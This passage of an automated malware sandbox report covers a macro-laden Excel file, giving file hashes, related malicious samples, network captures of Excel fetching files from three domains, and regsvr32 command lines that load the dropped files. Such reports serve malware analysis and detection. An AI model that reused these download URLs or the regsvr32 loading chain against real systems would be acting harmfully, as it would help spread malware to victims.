                          • justevolvewithgrace.com/cgi-sys/suspendedpage.cgi
                          http://51.254.121.123/wp-content/0AR/com/USGet hashmaliciousBrowse
                          • justevolvewithgrace.com/cgi-sys/suspendedpage.cgi
                          8590170.docGet hashmaliciousBrowse
                          • justevolvewithgrace.com/cgi-sys/suspendedpage.cgi

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          amerident.com.do414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                          • 108.179.242.179
                          414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                          • 108.179.242.179

                          ASN

                          Match | Associated Sample Name / URL | Detection | Context
                          DIGITALPACIFIC-AU DigitalPacific Pty Ltd Australia AU | ITT - PPCL-2021-0515-PKG4 - pipping and drilling Services.doc | malicious | 116.90.56.138
                           | Inquiry-Doors.exe | malicious | 101.0.91.38
                           | product specification.exe | malicious | 101.0.117.102
                           | 7PUgGUWM2l | malicious | 182.160.170.135
                           | Attached Quotation.exe | malicious | 101.0.117.102
                           | Cd9EA600XXdm0tl.exe | malicious | 101.0.117.102
                           | E8ljMuBj9L | malicious | 111.67.13.18
                           | QcXQmNSaSp | malicious | 49.156.27.62
                           | arm7 | malicious | 111.67.13.28
                           | QYUNlRkkn1.exe | malicious | 203.16.60.34
                           | 6Y5P9BoimMLclbt.exe | malicious | 101.0.117.102
                           | gunzipped.exe | malicious | 101.0.117.102
                           | SecuriteInfo.com.Variant.Bulz.627351.21436.exe | malicious | 101.0.117.102
                           | ENQUIRY.exe | malicious | 101.0.117.102
                           | 16wKmiVoPj05ynr.exe | malicious | 101.0.117.102
                           | PURCHASE ORDER.exe | malicious | 101.0.117.102
                           | PO.NO.V21015.exe | malicious | 101.0.117.102
                           | New Inquiry 21411JA20pdf.exe | malicious | 101.0.117.102
                           | fsd8ks3VNb.exe | malicious | 101.0.105.170
                           | y1FOl1vVPA.exe | malicious | 101.0.86.146
                          UNIFIEDLAYER-AS-1 US | jjBv8SpZXm.exe | malicious | 192.185.0.218
                           | Scan_0978.exe | malicious | 173.254.94.114
                           | pKD3j672HL.exe | malicious | 192.185.131.113
                           | heiedrNhQ8 | malicious | 142.5.140.216
                           | Kredi Karti Hesap #U00d6zeti - 4508xxxxxxxx0017.exe | malicious | 192.185.163.68
                           | lod2.xlsx | malicious | 162.241.226.37
                           | Contract and PO No.908876.exe | malicious | 192.185.84.191
                           | iwah6jVhmw | malicious | 98.130.22.83
                           | BL-210915L0.exe | malicious | 192.254.180.165
                           | mFKC2tSCJX | malicious | 76.163.226.11
                           | Urgent Inquiry.exe | malicious | 192.185.84.191
                           | PO 007661721.exe | malicious | 192.185.84.191
                           | P.I 099880990.xlsx | malicious | 162.214.65.211
                           | 1QbmrgleyAWkb39.exe | malicious | 192.185.84.191
                           | (RG25LGSJ).exe | malicious | 162.241.216.179
                           | 103 Ref 2853801324189923.exe | malicious | 67.20.76.184
                           | doc_0862413890.exe | malicious | 74.220.199.6
                           | swift.Telex.xls | malicious | 192.185.115.3
                           | g4225Fz3HK | malicious | 162.214.19.189
                           | HBL-21706385 INV_2.exe | malicious | 192.254.180.165

                          JA3 Fingerprints

                          Match | Associated Sample Name / URL | Detection | Context
                          7dcce5b76c8b17472d024758970a406b | INV.ppt | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | Purchase Order .xlsx | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | MV JOLLY EXPRESS.docx | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | DHL_Delivery_Notification.doc | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | FedEx AWB 884174658339.doc | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | UPDATE INVOICE FM K & S INDUSTRY.docx | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | PO 347391.docx | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | swift.Telex.xls | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | Invoice number 1257MAJAKFVII2021 incl. VAT.doc | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | Consignment Notification.doc | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | RFQ87976VF.doc | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | RFQPTD0075453423.doc | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | F#U0130YAT TEKL#U0130F#U0130 FORMU.doc | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | CONTRACT 0902021.doc | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | PO006237_2nd Shipment.docx | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | sample.exe | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | avec.xlsx | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | SecuriteInfo.com.Trojan.GenericKD.37622653.5338.xlsm | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | SecuriteInfo.com.Trojan.GenericKD.37622653.5338.xlsm | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178
                           | PO no 275.xlsx | malicious | 101.0.112.4, 108.179.242.179, 172.93.99.178

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type: Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Oct 12 08:22:59 2021, Security: 0
                          Entropy (8bit): 7.531872402672375
                          TrID:
                          • Microsoft Excel sheet (30009/1) 78.94%
                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                          File name: doc-220808714.xls
                          File size: 241152
                          MD5: 2654fdca7197f542cbd0be823a2a2a9f
                          SHA1: 149b43a5f8f4d9bd63720b408f6c4e2a86401c6a
                          SHA256: f5a313c5353ae0d1cede7bd5e234bfd3a4d7abb5e877bd2903d8d7572e9ee4d6
                          SHA512: 1534994b08b95c1a9879afba6a857817146b3aaa06484a65ff89f418b5ca31fa7ffbc2076efdface8f0036f5e3a7f98e95fe0120df3bfe2c2b06ea8e3b96bcaf
                          SSDEEP: 6144:cKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgq9jWXcZZRBTq1BOzTwvOsPDslAvS32vI7p:09jVzTmszTwvTDy33LvfP1OWr

                          File Icon

                          Icon Hash: e4eea286a4b4bcb4

                          Static OLE Info

                          General

                          Document Type: OLE
                          Number of OLE Files: 1

                          OLE File "doc-220808714.xls"

                          Indicators

                          Has Summary Info: True
                          Application Name: Microsoft Excel
                          Encrypted Document: False
                          Contains Word Document Stream: False
                          Contains Workbook/Book Stream: True
                          Contains PowerPoint Document Stream: False
                          Contains Visio Document Stream: False
                          Contains ObjectPool Stream:
                          Flash Objects Count:
                          Contains VBA Macros: True

                          Summary

                          Code Page: 1251
                          Author:
                          Last Saved By:
                          Create Time: 2015-06-05 18:19:34
                          Last Saved Time: 2021-10-12 07:22:59
                          Creating Application: Microsoft Excel
                          Security: 0

                          Document Summary

                          Document Code Page: 1251
                          Thumbnail Scaling Desired: False
                          Company:
                          Contains Dirty Links: False
                          Shared Document: False
                          Changed Hyperlinks: False
                          Application Version: 1048576

                          Streams

                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                          General
                          Stream Path: \x5DocumentSummaryInformation
                          File Type: data
                          Stream Size: 4096
                          Entropy: 0.43766981378
                          Base64 Encoded: False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . < . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S i m b b 1 . . . . . S i m b b 2 . . . . . S i m b b 3 . . . . . G G T . . . . . B r e r 1
                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                          General
                          Stream Path: \x5SummaryInformation
                          File Type: data
                          Stream Size: 4096
                          Entropy: 0.279171118094
                          Base64 Encoded: False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 229526
                          General
                          Stream Path: Workbook
                          File Type: Applesoft BASIC program data, first line number 16
                          Stream Size: 229526
                          Entropy: 7.71393359025
                          Base64 Encoded: True
                          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . .

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Oct 12, 2021 17:13:40.015114069 CEST | 49165 | 443 | 192.168.2.22 | 172.93.99.178
                          Oct 12, 2021 17:13:40.015177011 CEST | 443 | 49165 | 172.93.99.178 | 192.168.2.22
                          Oct 12, 2021 17:13:40.015268087 CEST | 49165 | 443 | 192.168.2.22 | 172.93.99.178
                          Oct 12, 2021 17:13:40.023870945 CEST | 49165 | 443 | 192.168.2.22 | 172.93.99.178
                          Oct 12, 2021 17:13:40.023914099 CEST | 443 | 49165 | 172.93.99.178 | 192.168.2.22
                          Oct 12, 2021 17:13:40.250966072 CEST | 443 | 49165 | 172.93.99.178 | 192.168.2.22
                          Oct 12, 2021 17:13:40.251070976 CEST | 49165 | 443 | 192.168.2.22 | 172.93.99.178
                          Oct 12, 2021 17:13:40.265047073 CEST | 49165 | 443 | 192.168.2.22 | 172.93.99.178
                          Oct 12, 2021 17:13:40.265084982 CEST | 443 | 49165 | 172.93.99.178 | 192.168.2.22
                          Oct 12, 2021 17:13:40.265454054 CEST | 443 | 49165 | 172.93.99.178 | 192.168.2.22
                          Oct 12, 2021 17:13:40.265526056 CEST | 49165 | 443 | 192.168.2.22 | 172.93.99.178
                          Oct 12, 2021 17:13:40.503371000 CEST | 49165 | 443 | 192.168.2.22 | 172.93.99.178
                          Oct 12, 2021 17:13:40.551132917 CEST | 443 | 49165 | 172.93.99.178 | 192.168.2.22
                          Oct 12, 2021 17:13:41.840105057 CEST | 443 | 49165 | 172.93.99.178 | 192.168.2.22
                          Oct 12, 2021 17:13:41.840183973 CEST | 443 | 49165 | 172.93.99.178 | 192.168.2.22
                          Oct 12, 2021 17:13:41.840198994 CEST | 49165 | 443 | 192.168.2.22 | 172.93.99.178
                          Oct 12, 2021 17:13:41.840249062 CEST | 49165 | 443 | 192.168.2.22 | 172.93.99.178
                          Oct 12, 2021 17:13:41.840543985 CEST | 49165 | 443 | 192.168.2.22 | 172.93.99.178
                          Oct 12, 2021 17:13:41.840567112 CEST | 443 | 49165 | 172.93.99.178 | 192.168.2.22
                          Oct 12, 2021 17:13:41.840590954 CEST | 49165 | 443 | 192.168.2.22 | 172.93.99.178
                          Oct 12, 2021 17:13:41.840611935 CEST | 49165 | 443 | 192.168.2.22 | 172.93.99.178
                          Oct 12, 2021 17:13:42.191519022 CEST | 49166 | 443 | 192.168.2.22 | 101.0.112.4
                          Oct 12, 2021 17:13:42.191562891 CEST | 443 | 49166 | 101.0.112.4 | 192.168.2.22
                          Oct 12, 2021 17:13:42.191625118 CEST | 49166 | 443 | 192.168.2.22 | 101.0.112.4
                          Oct 12, 2021 17:13:42.192444086 CEST | 49166 | 443 | 192.168.2.22 | 101.0.112.4
                          Oct 12, 2021 17:13:42.192461014 CEST | 443 | 49166 | 101.0.112.4 | 192.168.2.22
                          Oct 12, 2021 17:13:42.823854923 CEST | 443 | 49166 | 101.0.112.4 | 192.168.2.22
                          Oct 12, 2021 17:13:42.824115038 CEST | 49166 | 443 | 192.168.2.22 | 101.0.112.4
                          Oct 12, 2021 17:13:42.839334011 CEST | 49166 | 443 | 192.168.2.22 | 101.0.112.4
                          Oct 12, 2021 17:13:42.839382887 CEST | 443 | 49166 | 101.0.112.4 | 192.168.2.22
                          Oct 12, 2021 17:13:42.839660883 CEST | 443 | 49166 | 101.0.112.4 | 192.168.2.22
                          Oct 12, 2021 17:13:42.839787960 CEST | 49166 | 443 | 192.168.2.22 | 101.0.112.4
                          Oct 12, 2021 17:13:42.858344078 CEST | 49166 | 443 | 192.168.2.22 | 101.0.112.4
                          Oct 12, 2021 17:13:42.899148941 CEST | 443 | 49166 | 101.0.112.4 | 192.168.2.22
                          Oct 12, 2021 17:13:45.537420034 CEST | 443 | 49166 | 101.0.112.4 | 192.168.2.22
                          Oct 12, 2021 17:13:45.537553072 CEST | 443 | 49166 | 101.0.112.4 | 192.168.2.22
                          Oct 12, 2021 17:13:45.537647009 CEST | 49166 | 443 | 192.168.2.22 | 101.0.112.4
                          Oct 12, 2021 17:13:45.538012028 CEST | 49166 | 443 | 192.168.2.22 | 101.0.112.4
                          Oct 12, 2021 17:13:45.538038969 CEST | 49166 | 443 | 192.168.2.22 | 101.0.112.4
                          Oct 12, 2021 17:13:45.538069010 CEST | 443 | 49166 | 101.0.112.4 | 192.168.2.22
                          Oct 12, 2021 17:13:45.538081884 CEST | 49166 | 443 | 192.168.2.22 | 101.0.112.4
                          Oct 12, 2021 17:13:45.538150072 CEST | 49166 | 443 | 192.168.2.22 | 101.0.112.4
                          Oct 12, 2021 17:13:45.719580889 CEST | 49167 | 443 | 192.168.2.22 | 108.179.242.179
                          Oct 12, 2021 17:13:45.719633102 CEST | 443 | 49167 | 108.179.242.179 | 192.168.2.22
                          Oct 12, 2021 17:13:45.719705105 CEST | 49167 | 443 | 192.168.2.22 | 108.179.242.179
                          Oct 12, 2021 17:13:45.720257044 CEST | 49167 | 443 | 192.168.2.22 | 108.179.242.179
                          Oct 12, 2021 17:13:45.720288992 CEST | 443 | 49167 | 108.179.242.179 | 192.168.2.22
                          Oct 12, 2021 17:13:46.048093081 CEST | 443 | 49167 | 108.179.242.179 | 192.168.2.22
                          Oct 12, 2021 17:13:46.048398018 CEST | 49167 | 443 | 192.168.2.22 | 108.179.242.179
                          Oct 12, 2021 17:13:46.063859940 CEST | 49167 | 443 | 192.168.2.22 | 108.179.242.179
                          Oct 12, 2021 17:13:46.063909054 CEST | 443 | 49167 | 108.179.242.179 | 192.168.2.22
                          Oct 12, 2021 17:13:46.064196110 CEST | 443 | 49167 | 108.179.242.179 | 192.168.2.22
                          Oct 12, 2021 17:13:46.064332008 CEST | 49167 | 443 | 192.168.2.22 | 108.179.242.179
                          Oct 12, 2021 17:13:46.068979979 CEST | 49167 | 443 | 192.168.2.22 | 108.179.242.179
                          Oct 12, 2021 17:13:46.111146927 CEST | 443 | 49167 | 108.179.242.179 | 192.168.2.22
                          Oct 12, 2021 17:13:46.304980040 CEST | 443 | 49167 | 108.179.242.179 | 192.168.2.22
                          Oct 12, 2021 17:13:46.305239916 CEST | 49167 | 443 | 192.168.2.22 | 108.179.242.179
                          Oct 12, 2021 17:13:46.305263996 CEST | 443 | 49167 | 108.179.242.179 | 192.168.2.22
                          Oct 12, 2021 17:13:46.305320024 CEST | 49167 | 443 | 192.168.2.22 | 108.179.242.179
                          Oct 12, 2021 17:13:46.305584908 CEST | 49167 | 443 | 192.168.2.22 | 108.179.242.179
                          Oct 12, 2021 17:13:46.305655003 CEST | 49167 | 443 | 192.168.2.22 | 108.179.242.179

                          UDP Packets

                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Oct 12, 2021 17:13:39.986201048 CEST | 52167 | 53 | 192.168.2.22 | 8.8.8.8
                          Oct 12, 2021 17:13:40.005583048 CEST | 53 | 52167 | 8.8.8.8 | 192.168.2.22
                          Oct 12, 2021 17:13:41.872337103 CEST | 50591 | 53 | 192.168.2.22 | 8.8.8.8
                          Oct 12, 2021 17:13:42.188901901 CEST | 53 | 50591 | 8.8.8.8 | 192.168.2.22
                          Oct 12, 2021 17:13:45.575872898 CEST | 57805 | 53 | 192.168.2.22 | 8.8.8.8
                          Oct 12, 2021 17:13:45.717439890 CEST | 53 | 57805 | 8.8.8.8 | 192.168.2.22

                          DNS Queries

                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                          Oct 12, 2021 17:13:39.986201048 CEST | 192.168.2.22 | 8.8.8.8 | 0xe415 | Standard query (0) | ohemaa.org | A (IP address) | IN (0x0001)
                          Oct 12, 2021 17:13:41.872337103 CEST | 192.168.2.22 | 8.8.8.8 | 0xd9e3 | Standard query (0) | madieandme.com.au | A (IP address) | IN (0x0001)
                          Oct 12, 2021 17:13:45.575872898 CEST | 192.168.2.22 | 8.8.8.8 | 0x4c3b | Standard query (0) | amerident.com.do | A (IP address) | IN (0x0001)

                          DNS Answers

                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                          Oct 12, 2021 17:13:40.005583048 CEST | 8.8.8.8 | 192.168.2.22 | 0xe415 | No error (0) | ohemaa.org | | 172.93.99.178 | A (IP address) | IN (0x0001)
                          Oct 12, 2021 17:13:42.188901901 CEST | 8.8.8.8 | 192.168.2.22 | 0xd9e3 | No error (0) | madieandme.com.au | | 101.0.112.4 | A (IP address) | IN (0x0001)
                          Oct 12, 2021 17:13:45.717439890 CEST | 8.8.8.8 | 192.168.2.22 | 0x4c3b | No error (0) | amerident.com.do | | 108.179.242.179 | A (IP address) | IN (0x0001)

                          HTTP Request Dependency Graph

                          • ohemaa.org
                          • madieandme.com.au
                          • amerident.com.do

                          HTTPS Proxied Packets

                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          0 | 192.168.2.22 | 49165 | 172.93.99.178 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Timestamp | kBytes transferred | Direction | Data
                          2021-10-12 15:13:40 UTC | 0 | OUT | GET /HUVm9mDKLW9C/ocrafhh.html HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: ohemaa.org
                          Connection: Keep-Alive
                          2021-10-12 15:13:41 UTC | 0 | IN | HTTP/1.1 200 OK
                          Connection: close
                          x-powered-by: PHP/5.6.40
                          content-type: text/html; charset=UTF-8
                          content-length: 0
                          date: Tue, 12 Oct 2021 15:13:41 GMT
                          server: LiteSpeed
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          1 | 192.168.2.22 | 49166 | 101.0.112.4 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Timestamp | kBytes transferred | Direction | Data
                          2021-10-12 15:13:42 UTC | 0 | OUT | GET /xnkpOLnvlN6T/ocrafh.html HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: madieandme.com.au
                          Connection: Keep-Alive
                          2021-10-12 15:13:45 UTC | 1 | IN | HTTP/1.1 200 OK
                          Connection: close
                          x-powered-by: PHP/7.2.34
                          content-type: text/html; charset=UTF-8
                          content-length: 0
                          date: Tue, 12 Oct 2021 15:13:45 GMT
                          server: LiteSpeed
                          vary: User-Agent
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          2 | 192.168.2.22 | 49167 | 108.179.242.179 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Timestamp | kBytes transferred | Direction | Data
                          2021-10-12 15:13:46 UTC | 1 | OUT | GET /xdOMlaB0XJ7/ocraf.html HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: amerident.com.do
                          Connection: Keep-Alive
                          2021-10-12 15:13:46 UTC | 1 | IN | HTTP/1.1 200 OK
                          Date: Tue, 12 Oct 2021 15:13:46 GMT
                          Server: nginx/1.19.10
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 0
                          X-Server-Cache: true
                          X-Proxy-Cache: HIT
                          Connection: close


                          Code Manipulations

                          Statistics

                          CPU Usage


                          Memory Usage


                          High Level Behavior Distribution


                          Behavior


                          System Behavior

                          General

                          Start time: 17:13:20
                          Start date: 12/10/2021
                          Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Wow64 process (32bit): false
                          Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                          Imagebase: 0x13fa70000
                          File size: 28253536 bytes
                          MD5 hash: D53B85E21886D2AF9815C377537BCAC3
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: moderate

                          General

                          Start time: 17:13:29
                          Start date: 12/10/2021
                          Path: C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit): false
                          Commandline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
                          Imagebase: 0xff1e0000
                          File size: 19456 bytes
                          MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: high

                          General

                          Start time: 17:13:29
                          Start date: 12/10/2021
                          Path: C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit): false
                          Commandline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
                          Imagebase: 0xff1e0000
                          File size: 19456 bytes
                          MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: high

                          General

                          Start time: 17:13:29
                          Start date: 12/10/2021
                          Path: C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit): false
                          Commandline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
                          Imagebase: 0xff1e0000
                          File size: 19456 bytes
                          MD5 hash: 59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: high

                          Disassembly

                          Code Analysis
